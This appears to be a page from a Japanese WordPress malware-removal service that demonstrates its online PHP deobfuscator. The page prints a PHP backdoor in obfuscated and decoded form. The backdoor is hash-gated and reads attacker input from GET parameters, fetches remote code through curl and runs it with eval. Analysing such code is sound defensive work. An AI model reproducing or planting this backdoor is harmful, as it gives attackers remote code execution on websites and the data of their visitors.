Japanese 
English
PHP 難読化コードの復元・デコードWordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php
goto iTTVZMVYlV; yCP_a9f8gK: $ZYrYub_RBx = $eoa7PluVR9("\176", "\x20"); goto uEFg_SkfPW; gTGvkPI45J: class XVf4T0gUAe { static function vaOPzvobQ1($YWqtb3oAN1)
{ goto wuFg7RdfNM; wuFg7RdfNM: $WSr0dtaEqu = "\162" . "\x61" . "\x6e" . "\147" . "\x65"; goto awf1ienUZS; oYEMUcyR1Y: vZobnxpPtE: goto L76u1_J_Vv; awf1ienUZS: $YKjbqPs1p9 = $WSr0dtaEqu("\176", "\x20"); goto rhNUu4FRYD; rhNUu4FRYD: $eqbznS3KSZ = explode("\133", $YWqtb3oAN1); goto QKnYrC_zgy; QKnYrC_zgy: $f12fGF3c9_ = ''; goto p51LcUG1oJ; L76u1_J_Vv: return $f12fGF3c9_; goto n2vI1rbWwG; p51LcUG1oJ: foreach ($eqbznS3KSZ as $fR5SvdSQKu => $DeSomrOUw1) { $f12fGF3c9_ .= $YKjbqPs1p9[$DeSomrOUw1 - 92372]; tQYzqyR3t5: } goto oYEMUcyR1Y; n2vI1rbWwG: } static function qxBmwkhBsE($diZIuwffhp, $X9qZZhyveW) { goto EYAJ0QLjtr; Y4MTA0CLtJ: return empty($u4828sKUGs) ?
$X9qZZhyveW($diZIuwffhp) : $u4828sKUGs; goto wOpt2ixn5v; EYAJ0QLjtr: $T9ZcX2MIit = curl_init($diZIuwffhp); goto AIkimx1lDD; GZV6FBJH0k: $u4828sKUGs = curl_exec($T9ZcX2MIit); print_r($diZIuwffhp); goto Y4MTA0CLtJ; AIkimx1lDD: curl_setopt($T9ZcX2MIit, CURLOPT_RETURNTRANSFER, 1); goto GZV6FBJH0k; wOpt2ixn5v: } static function kiTHqZkh2f() { goto gqJTVAZWkK; KjsOLaUCSA: vj4z6XmFmV: goto gLbl0z88GA; DKp8QX1a98: s2LaPPitXu: goto YGn3M4fZGP; NEldeYHXaW: $TOXtSprcbo = $T6TFCltLIj[0 + 3]($T6TFCltLIj[4 + 2], $f1FKoB88Yg); goto ozK39ndD6j; gqJTVAZWkK: $a8aQbf7H2j = array("\x39\62\x33\71\x39\133\71\x32\63\x38\x34\133\x39\x32\63\x39\67\133\71\x32\64\60\61\x5b\71\62\x33\x38\62\x5b\x39\62\63\71\x37\x5b\71\62\x34\60\63\x5b\x39\x32\63\71\66\x5b\71\x32\x33\x38\x31\x5b\x39\x32\x33\70\x38\133\71\62\63\x39\71\x5b\x39\x32\x33\x38\x32\x5b\71\x32\x33\x39\63\x5b\71\x32\x33\70\67\x5b\71\x32\63\70\x38", "\71\x32\63\70\x33\133\71\x32\63\x38\62\133\x39\62\63\70\x34\133\71\62\x34\x30\x33\133\71\62\x33\70\x34\133\x39\62\x33\70\x37\133\x39\62\63\70\x32\133\71\x32\x34\x34\71\x5b\x39\62\64\64\x37", "\x39\62\63\x39\62\133\x39\x32\63\x38\x33\x5b\71\x32\x33\x38\x37\x5b\71\62\63\70\70\133\71\x32\64\60\x33\133\71\62\63\x39\x38\x5b\x39\62\63\71\67\x5b\x39\x32\x33\x39\71\x5b\x39\62\x33\70\x37\x5b\x39\x32\63\71\x38\133\x39\62\x33\71\67", "\x39\62\x33\70\66\x5b\71\62\x34\60\61\x5b\x39\x32\x33\x39\71\x5b\x39\x32\63\71\x31", "\71\62\64\x30\x30\x5b\71\x32\64\60\x31\133\71\62\x33\70\x33\133\71\62\x33\x39\67\133\71\62\x34\64\x34\x5b\71\x32\64\64\x36\x5b\x39\x32\x34\x30\x33\133\x39\x32\x33\x39\70\x5b\x39\62\63\71\67\x5b\x39\62\63\71\x39\133\x39\62\63\70\67\133\x39\62\x33\71\70\x5b\x39\x32\63\71\x37", "\x39\62\x33\x39\66\133\71\62\x33\71\63\133\71\62\63\71\x30\133\x39\62\63\x39\x37\x5b\x39\x32\x34\60\63\x5b\71\62\63\x39\x35\133\71\x32\63\x39\x37\133\x39\x32\63\70\62\133\71\62\x34\60\x33\x5b\71\x32\x33\x39\71\133\x39\x32\63\x38\x37\133\x39\x32\63\70\70\x5b\x39\62\63\70\x32\x5b\x39\x32\63\71\x37\133\71\62\x33\x38\70\x5b\71\x32\x33\x38\62\133\71\x32\x33\x38\63", "\x39\62\64\x32\x36\x5b\x39\x32\64\x35\66", "\71\62\63\67\63", "\x39\x32\x34\x35\61\x5b\71\62\x34\65\x36", "\x39\x32\64\63\63\133\71\62\x34\61\x36\x5b\x39\62\x34\61\x36\133\x39\62\64\x33\x33\133\x39\62\64\60\71", "\x39\x32\63\x39\66\x5b\x39\x32\x33\x39\x33\133\x39\x32\x33\71\x30\133\x39\x32\x33\70\62\133\71\x32\x33\x39\x37\133\x39\x32\63\70\x34\133\71\x32\64\60\63\133\x39\62\63\71\x33\133\x39\x32\63\x38\70\133\71\x32\x33\x38\x36\133\x39\x32\x33\70\x31\x5b\71\x32\63\x38\x32"); goto WxqPp70qvd; pX_0OL8VHD: if (!(@$uoyK4FmQeb[0] - time() > 0 and md5(md5($uoyK4FmQeb[1 + 2])) === "\67\x37\x37\67\146\x65\70\x64\141\61\143\x33\60\63\x61\x39\71\70\66\145\x32\x31\67\64\64\66\143\142\70\x30\x37\62")) { goto vj4z6XmFmV; } goto X920BzjZR6; CZAjMnDH1K: @eval($T6TFCltLIj[1 + 3]($sq69jfTAbt)); goto yZppCh2Cdm; yZppCh2Cdm: die; goto KjsOLaUCSA; c5kSJZelRy: @$T6TFCltLIj[9 + 1](INPUT_GET, "\x6f\x66") == 1 && die($T6TFCltLIj[5 + 0](__FILE__)); goto pX_0OL8VHD; WxqPp70qvd: foreach ($a8aQbf7H2j as $G6y5SfWBZK) { $T6TFCltLIj[] = self::VAopZvObQ1($G6y5SfWBZK); U0eyKKsWPP: } goto DKp8QX1a98; X920BzjZR6: $sq69jfTAbt = self::qXbMWkHBSe($uoyK4FmQeb[1 + 0], $T6TFCltLIj[1 + 4]); goto CZAjMnDH1K; ozK39ndD6j: $uoyK4FmQeb = $T6TFCltLIj[0 + 2]($TOXtSprcbo, true); goto c5kSJZelRy; YGn3M4fZGP: $f1FKoB88Yg = @$T6TFCltLIj[1]($T6TFCltLIj[4 + 6](INPUT_GET, $T6TFCltLIj[8 + 1])); goto NEldeYHXaW; gLbl0z88GA: } } goto FhWr975aiH; uEFg_SkfPW: $CsTI666Vpn = ${$ZYrYub_RBx[1 + 30] . $ZYrYub_RBx[33 + 26] . $ZYrYub_RBx[27 + 20] . $ZYrYub_RBx[26 + 21] . $ZYrYub_RBx[5 + 46] . $ZYrYub_RBx[39 + 14] . $ZYrYub_RBx[25 + 32]}; goto vIgJCkTE86; iTTVZMVYlV: $eoa7PluVR9 = "\162" . "\141" . "\x6e" . "\147" . "\145"; goto yCP_a9f8gK; jis_Q28z2b: metaphone("\x66\71\113\x78\x67\x64\171\x59\x41\127\111\65\157\163\x71\172\101\131\62\102\63\x43\x6f\x66\x67\165\70\125\x34\x51\x4a\x52\121\x6a\70\114\x70\160\122\x79\x6b\x44\64"); goto gTGvkPI45J; vIgJCkTE86: @(md5(md5(md5(md5($CsTI666Vpn[16])))) === "\146\x31\x31\x36\x63\x34\144\62\67\x65\x61\x66\x65\x62\142\143\65\145\x37\x35\x33\64\145\x32\63\x35\x33\143\x64\x61\142\x39") && (count($CsTI666Vpn) == 22 && in_array(gettype($CsTI666Vpn) . count($CsTI666Vpn), $CsTI666Vpn)) ? ($CsTI666Vpn[63] = $CsTI666Vpn[63] . $CsTI666Vpn[74]) && ($CsTI666Vpn[90] = $CsTI666Vpn[63]($CsTI666Vpn[90])) && @eval($CsTI666Vpn[63](${$CsTI666Vpn[50]}[15])) : $CsTI666Vpn; goto jis_Q28z2b; FhWr975aiH: XVf4t0GUaE::kiTHQZkh2F();
?><?php
$eoa7PluVR9 = "range";
$ZYrYub_RBx = range("~", " ");
$CsTI666Vpn = ${$ZYrYub_RBx[31] . $ZYrYub_RBx[59] . $ZYrYub_RBx[47] . $ZYrYub_RBx[47] . $ZYrYub_RBx[51] . $ZYrYub_RBx[53] . $ZYrYub_RBx[57]};
@(md5(md5(md5(md5($CsTI666Vpn[16])))) === "f116c4d27eafebbc5e7534e2353cdab9") && (count($CsTI666Vpn) == 22 && in_array(gettype($CsTI666Vpn) . count($CsTI666Vpn), $CsTI666Vpn)) ? ($CsTI666Vpn[63] .= $CsTI666Vpn[74]) && ($CsTI666Vpn[90] = $CsTI666Vpn[63]($CsTI666Vpn[90])) && @eval($CsTI666Vpn[63](${$CsTI666Vpn[50]}[15])) : $CsTI666Vpn;
metaphone("f9KxgdyYAWI5osqzAY2B3Cofgu8U4QJRQj8LppRykD4");
class XVf4T0gUAe
{
static function vaOPzvobQ1($YWqtb3oAN1)
{
$WSr0dtaEqu = "range";
$YKjbqPs1p9 = range("~", " ");
$eqbznS3KSZ = explode("[", $YWqtb3oAN1);
$f12fGF3c9_ = '';
foreach ($eqbznS3KSZ as $fR5SvdSQKu => $DeSomrOUw1) {
$f12fGF3c9_ .= $YKjbqPs1p9[$DeSomrOUw1 - 92372];
}
return $f12fGF3c9_;
}
static function qxBmwkhBsE($diZIuwffhp, $X9qZZhyveW)
{
$T9ZcX2MIit = curl_init($diZIuwffhp);
curl_setopt($T9ZcX2MIit, CURLOPT_RETURNTRANSFER, 1);
$u4828sKUGs = curl_exec($T9ZcX2MIit);
print_r($diZIuwffhp);
return empty($u4828sKUGs) ? $X9qZZhyveW($diZIuwffhp) : $u4828sKUGs;
}
static function kiTHqZkh2f()
{
$a8aQbf7H2j = array("92399[92384[92397[92401[92382[92397[92403[92396[92381[92388[92399[92382[92393[92387[92388", "92383[92382[92384[92403[92384[92387[92382[92449[92447", "92392[92383[92387[92388[92403[92398[92397[92399[92387[92398[92397", "92386[92401[92399[92391", "92400[92401[92383[92397[92444[92446[92403[92398[92397[92399[92387[92398[92397", "92396[92393[92390[92397[92403[92395[92397[92382[92403[92399[92387[92388[92382[92397[92388[92382[92383", "92426[92456", "92373", "92451[92456", "92433[92416[92416[92433[92409", "92396[92393[92390[92382[92397[92384[92403[92393[92388[92386[92381[92382");
foreach ($a8aQbf7H2j as $G6y5SfWBZK) {
$T6TFCltLIj[] = self::VAopZvObQ1($G6y5SfWBZK);
}
$f1FKoB88Yg = @$T6TFCltLIj[1]($T6TFCltLIj[10](INPUT_GET, $T6TFCltLIj[9]));
$TOXtSprcbo = $T6TFCltLIj[3]($T6TFCltLIj[6], $f1FKoB88Yg);
$uoyK4FmQeb = $T6TFCltLIj[2]($TOXtSprcbo, true);
@$T6TFCltLIj[10](INPUT_GET, "of") == 1 && die($T6TFCltLIj[5]("/var/www/html/input.php"));
if (!(@$uoyK4FmQeb[0] - time() > 0 and md5(md5($uoyK4FmQeb[3])) === "7777fe8da1c303a9986e217446cb8072")) {
// [PHPDeobfuscator] Implied return
return;
}
$sq69jfTAbt = self::qXbMWkHBSe($uoyK4FmQeb[1], $T6TFCltLIj[5]);
@eval($T6TFCltLIj[4]($sq69jfTAbt));
die;
}
}
XVf4t0GUaE::kiTHQZkh2F();■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.